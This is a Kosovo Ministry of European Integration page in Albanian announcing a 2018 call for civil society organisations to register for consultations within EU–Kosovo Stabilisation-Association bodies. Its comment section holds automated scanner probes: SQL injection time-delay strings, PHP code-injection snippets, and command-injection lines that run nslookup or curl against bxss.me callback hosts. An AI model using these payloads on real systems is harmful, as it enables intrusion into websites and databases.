Integrimi Evropian

Integrimi Evropian

Shpallje publike

15 Shkurt, 2018

Shpallje publike për regjistrimin e organizatave të shoqërisë civile dhe palëve të tjera të interesuara për mekanizmin konsultues në kuadër të Organeve të Stabilizim-Asociimit BE – Kosovë

 

Në pajtim me Rregulloren nr. 13/2016 mbi Funksionimin dhe Përfaqësimin e Institucioneve të Qeverisë së Republikës së Kosovës në Strukturat e Stabilizim-Asociimit dhe Rregulloren nr. 05/2016 mbi Standardet Minimale për Procesin e Konsultimit Publik, Ministria e Integrimit Evropian nxjerr këtë:

 

Shpallje publike për regjistrimin e organizatave të shoqërisë civile dhe palëve të tjera të interesuara për mekanizmin konsultues në kuadër të Organeve të Stabilizim-Asociimit BE – Kosovë

I.Konteksti

Rregullorja nr. 13/2016 e detyron Qeverinë që të bashkëpunojë me OShC-të dhe palët e tjera të interesuara në kuadër të OSA-ve: në përgatitjen e mbledhjeve të OSA-ve, në mbështetjen e zbatimit të reformave të dakorduara në këto mbledhje dhe në monitorimin e zbatimit të tyre. Rregullorja nr. 05/2016 përcakton standardet minimale, parimet dhe procedurat e konsultimit publik ndërmjet autoriteteve publike, grupeve të interesuara dhe publikut të gjerë në proceset e hartimit të legjislacionit dhe të politikave.

Prandaj, pjesëmarrja e OShC-ve dhe palëve të tjera të interesuara është me rëndësi jetike për të kuptuarit e përgjithshëm të MSA-së, si dhe për zhvillimin dhe zbatimin e reformave dhe për të siguruar ndikim pozitiv të këtij të fundit në zhvillimin e shoqërisë sonë. Duke promovuar në mënyrë aktive rolin e OShC-ve dhe palëve të tjera të interesuara në procesin e integrimit evropian, ky mekanizëm konsultimi krijon hapësirë për përfshirjen e OShC-ve dhe palëve të tjera të interesuara në zbatimin e MSA-së. Qëllimi i këtij mekanizmi konsultues është që të sigurohet që pikëpamjet e OSHC-ve dhe palëve të tjera të interesuara të pasqyrohen në mënyrë adekuate në kuadër të punës së OSA-ve, me synimin drejt një qasjeje pjesëmarrëse në zbatimin e reformave që kërkon MSA.

II.Mbledhjet konsultuese tematike

Përmes kësaj shpalljeje ftohen përfaqësuesit e OShC-ve dhe palëve të tjera të interesuara që të regjistrohen për të marrë pjesë në konsultime të rregullta në kuadër të një (1) ose më tepër OSA, duke caktuar një (1) përfaqësues në mbledhjet konsultuese për secilën OSA me interes për to.

Regjistrimi është i hapur për konsultime në kuadër të këtyre OSA-ve:

 • Komitetit të Stabilizim-Asociimit (Komitetit) (fushëveprimi: të gjitha fushat në kuadër të MSA-së);
 • Nënkomiteteve të Stabilizim-Asociimit (NKSA) dhe Grupeve të Veçanta të Stabilizim-Asociimit (GVSA):
  • NKSA për Tregti, Industri, Dogana dhe Tatime (fushëveprimi: Produktet industriale; Çështjet tregtare; Standardizimi, metrologjia, akreditimi, certifikimit, vlerësimi i konformitetit dhe mbikëqyrja e tregut; Bashkëpunimi në fushën e industrisë; NVM-të; Turizmi; Doganat; Tatimet; Rregullat e origjinës; Asistenca e ndërsjellë administrative në çështjet doganore);
  • SASC për Bujqësi dhe Peshkatari (fushëveprimi: Produktet bujqësore; Produktet e peshkimit; Produkteve bujqësore të përpunuara, Verërat; Mbrojtja e treguesve gjeografikë për produkte dhe ushqime bujqësore dhe të peshkimit përveç pijeve alkoolike; Sektori i bujqësisë dhe ai agro-industrial, çështjet veterinare dhe ato fitosanitare; Bashkëpunimi në fushën e peshkatarisë);
  • NKSA për Treg të Brendshëm dhe Konkurrencë (fushëveprimi: E drejta e themelimit të kompanive; Ofrimi i shërbimeve; Çështje të tjera që lidhen me Kreun IV të MSA-së; Përafrimi i legjislacionit dhe zbatimi i ligjit; Konkurrenca; Pronësia intelektuale, industriale dhe komerciale; Prokurimi publik; Bankat, shërbimet e sigurimit dhe shërbime të tjera financiare; Mbrojtja e konsumatorit);
  • NKSA për Çështjet Ekonomike e Financiare dhe Statistika (fushëveprimi: Pagesat rrjedhëse dhe lëvizja e kapitalit; Politikat ekonomike; Bashkëpunimi në fushën e statistikave; Promovimi dhe mbrojtja e investimeve; Bashkëpunimi financiar);
  • NKSA për Drejtësi, Liri dhe Siguri (fushëveprimi: Fuqizimi i institucioneve dhe sundimit të ligjit; Të drejtat themelore, përfshirë anti-diskriminimin dhe mbrojtjen e të dhënave; Bashkëpunimit gjyqësor në çështjet civile dhe penale; Vizat, kontrolli kufitar, azili dhe migrimi; Parandalimi dhe kontrolli i imigrimit të paligjshëm, ripranimi; Shpëlarja e parave; Drogat; Luftimi i terrorizmit; Parandalimi i krimit të organizuar dhe aktiviteteve të tjera të paligjshme);
  • NKSA për Inovacion, Shoqëria të Informacionit dhe Politika Sociale (fushëveprimi: Kushtet e punës dhe mundësitë e barabarta; Bashkëpunimi në fushën e çështjeve sociale; Arsimi dhe trajnimet; Bashkëpunimi në fushën e kulturës; Bashkëpunimi në fushën e politikave audiovizuale; Shoqëria e informacionit; Rrjetet dhe shërbimet e komunikimit elektronik; Informimi dhe komunikimi; Hulumtimet shkencore dhe zhvillimi teknologjik);
  • NKSA për Transport, Energji, Mjedis dhe Zhvillim Rajonal (fushëveprimi: Transportit, Energjia; Mjedisi; Ndryshimet klimatike; Mbrojtja civile; Zhvillimi rajonal dhe lokal);
  • GVSA për Reformën e Administratës Publike (fushëveprimi: reforma e administratës publike); dhe
  • GVSA për Normalizim (fushëveprimi: Përmirësimi i dukshëm dhe i qëndrueshëm i marrëdhënieve të Kosovës me Serbinë, dhe bashkëpunimi efektiv me misionin PPSM të BE-së gjatë shërbimit të tij).

III.Kriteret dhe e drejta për regjistrim

Secila organizatë që kërkon të regjistrohet për këtë mekanizëm konsultimi është e obliguar të përmbushë këto kritere:

 • Të jetë e regjistruar dhe veprojë në territorin e Republikës së Kosovës, në përputhje me Ligjin nr. 04/L-57 për Lirinë e Asociimit në Organizatat Joqeveritare në Republikën e Kosovës, ose një ligj tjetër në fuqi;
 • Të jetë aktive gjatë së paku një (1) viti para nxjerrjes së kësaj shpalljeje publike;
 • Të veprojnë në të paktën njërën nga fushat e përvijuara në pjesën II të kësaj shpalljeje publike, më sipër (e përcaktuar me Statut/dokument tjetër relevant ligjor të organizatës).

Kufizimet e regjistrimit:

 • Secila organizatë që kërkon të regjistrohet për konsultime në fusha politikash jashtë fushëveprimit të OSA-ve, të përvijuara në pjesën II të kësaj shpalljeje, më sipër, nuk ka të drejtë ta bëjë këtë;
 • Secila organizatë që kërkon të regjistrohet nuk mund të përfaqësohet nga më tepër së një (1) person për një OSA. Ato mund të përfaqësohen nga një (1) përfaqësues në më shumë se një (1) OSA;
 • Secila organizatë që kërkon të regjistrohet nuk mund të përfaqësohet nga persona që garojnë dhe/ose janë të zgjedhur në poste politike;
 • Të punësuarit me orar të plotë të çfarëdo institucioni publik që merret me cilëndo nga fushat e politikave të përvijuara në pjesën II të kësaj shpalljeje, më sipër, nuk kanë të drejtë të përfaqësojnë ndonjë organizatë që kërkon të regjistrohet për këtë mekanizëm konsultues;
 • Secili person nuk ka të drejtë të përfaqësojë më tepër se një (1) organizatë që kërkon të regjistrohet për këtë mekanizëm konsultues.

Nëse asnjë organizatë nuk dorëzon kërkesë(a) për regjistrim në një (1) ose më shumë nga OSA-të (për fushat e politikave të përvijuara në pjesën II të kësaj shpalljeje, më sipër), MIE mund të nxjerrë përsëri këtë shpallje publike. Ajo gjithashtu mund ta nxjerrë këtë përsëri kur të ketë nevojë për të përditësuar listën e palëve të interesuara për këtë mekanizëm konsultimi.

IV.Mandati

Organizatat e regjistruara dhe përfaqësuesit e tyre bëhen automatikisht anëtarë të mekanizmit të konsultimit në kuadër të organeve të stabilizim – asociimit BE – Kosovë për një periudhë kohore deri kur ky udhëzues të shfuqizohet nga Qeveria. Mandati i një përfaqësuesi të një organizate të regjistruar për këtë mekanizëm konsultimi mund të përfundojë para skadimit të tij në rast të:

 • Dorëheqjes së saj/tij nga ky mekanizëm konsultues;
 • Dorëheqjes së saj/tij nga pozita në organizatën të cilën janë regjistruar ta përfaqësojnë;
 • Dështimi të përfaqësuesit të organizatës për të marrë pjesë në tri (3) mbledhje të njëpasnjëshme konsultuese;
 • Kërkesës së organizatës që përfaqësojnë për ta zëvendësuar atë me një përfaqësues tjetër.

Në rast se krijohen vende të lira për arsyet e përmendura në këtë pjesë, MIE mund të nxjerrë përsëri këtë shpallje publike.

V.Procedura dhe dokumentacioni për regjistrim

Procedura e regjistrimit për këtë mekanizëm konsultimi synon të ruajë balancën mes përfaqësueshmërisë (duke u mundësuar të gjitha palëve të interesuara që të regjistrohen për OSA-të që bien në kuadër të fushëveprimit të misionit të tyre), dhe ekspertizës (duke vendosur kritere minimale që duhet përmbushur si nga organizatat ashtu edhe përfaqësuesit e tyre në këtë mekanizëm konsultimi).

Secila organizatë obligohet të dorëzojë këto dokumente:

 • Formularin e regjistrimit – të plotësuar (pjesën VI të kësaj shtojce); dhe
 • Certifikatën e regjistrimit të organizatës.

Pas pranimit të kërkesave për regjistrim, MIE do të përpilojë Listën e organizatave të regjistruara për mekanizmin konsultues me OShC dhe palë të tjera të interesuara në kuadër të organeve të stabilizim-asociimit BE – Kosovë jo më vonë se pesëmbëdhjetë (15) ditë pune pas skadimit të afatit për dorëzimin e kërkesave për regjistrim. Ajo do ta publikojë këtë listë në ueb-faqen e saj zyrtare dhe do t’i njoftojë organizatat përkatëse përmes postës elektronike, duke i ftuar kështu zyrtarisht që të bëhen pjesë e këtij mekanizmi konsultues.

Procedura e përshkruar në këtë pjesë do të ndiqet edhe në rastet kur nxirret përsëri kjo shpallje publike.

Ju lutemi të dorëzoni Formularin për regjistrim (të plotësuar dhe nënshkruar) në format elektronik (te mei@rks-gov.net) ose në format të shtypur – personalisht ose përmes postës (në zyrat e MIE-së, adresa: Ndërtesa kryesore e Qeverisë, Kati VIII, Zyra 806, 10000 Prishtinë, Kosovë) deri të premten, më 9 mars 2018, në 16:00, sipas kohës lokale.

Për më tepër hollësi rreth mekanizmit konsultues në kuadër të Organeve të Stabilizim-Asociimit BE – Kosovë, shihni Udhëzuesin më poshtë.

Last modified: 28 Korrik, 2022

70 Responses to " Shpallje publike "

 1. … [Trackback]

  […] Information on that Topic: integrimievropian.rks-gov.net/shpallje-publike/ […]

 2. 1 thotë:

  ‘”()

 3. 1 thotë:

  ;assert(base64_decode(‘cHJpbnQobWQ1KDMxMzM3KSk7’));

 4. 1 thotë:

  ‘.print(md5(31337)).’

 5. 1 thotë:

  /etc/shells

 6. 1 thotë:

  “+”A”.concat(70-3).concat(22*4).concat(114).concat(86).concat(112).concat(83)+(require”socket”
  Socket.gethostbyname(“hitkr”+”yzdiwion8ac13.bxss.me.”)[3].to_s)+”

 7. 1 thotë:

  ../555

 8. 1 thotë:

  response.write(9388146*9269772)

 9. 1 thotë:

  1 waitfor delay ‘0:0:15’ —

 10. 1 thotë:

  `(nslookup -q=cname hitwpzfvcubwu08a65.bxss.me||curl hitwpzfvcubwu08a65.bxss.me)`

 11. 1 thotë:

  ‘;print(md5(31337));$a=’

 12. 1 thotë:

  to@example.com>
  bcc:0.3-22420.3.36a73.19654.2@bxss.me

 13. 1 thotë:

  response.write(9636278*9958018)

 14. 1 thotë:

  555&echo oxmrjf$()\ sfmnah\nz^xyu||a #’ &echo oxmrjf$()\ sfmnah\nz^xyu||a #|” &echo oxmrjf$()\ sfmnah\nz^xyu||a #

 15. 1 thotë:

  &nslookup -q=cname hitcvvcaivmare2e5c.bxss.me&’\”`0&nslookup -q=cname hitcvvcaivmare2e5c.bxss.me&`’

 16. 1 thotë:

  ;(nslookup -q=cname hitqwofcvgxzade089.bxss.me||curl hitqwofcvgxzade089.bxss.me)|(nslookup -q=cname hitqwofcvgxzade089.bxss.me||curl hitqwofcvgxzade089.bxss.me)&(nslookup -q=cname hitqwofcvgxzade089.bxss.me||curl hitqwofcvgxzade089.bxss.me)

 17. 1 thotë:

  (select(0)from(select(sleep(15)))v)/*’+(select(0)from(select(sleep(15)))v)+'”+(select(0)from(select(sleep(15)))v)+”*/

 18. 1 thotë:

  -1; waitfor delay ‘0:0:15’ —

 19. 1 thotë:

  -1); waitfor delay ‘0:0:15’ —

 20. 1 thotë:

  MjdQy5Fo’; waitfor delay ‘0:0:15’ —

 21. 1 thotë:

  -5 OR 368=(SELECT 368 FROM PG_SLEEP(15))–

 22. 1 thotë:

  -5) OR 870=(SELECT 870 FROM PG_SLEEP(15))–

 23. 1 thotë:

  Yv1ZTH9t’ OR 511=(SELECT 511 FROM PG_SLEEP(15))–

 24. 1 thotë:

  JRrXJgPr’)) OR 463=(SELECT 463 FROM PG_SLEEP(15))–

 25. 1 thotë:

  555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

 26. 1 thotë:

  555’||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||’

 27. … [Trackback]

  […] Here you can find 72144 additional Information to that Topic: integrimievropian.rks-gov.net/shpallje-publike/ […]

Lini një Përgjigje

Adresa juaj email s’do të bëhet publike. Fushat e domosdoshme janë shënuar me një *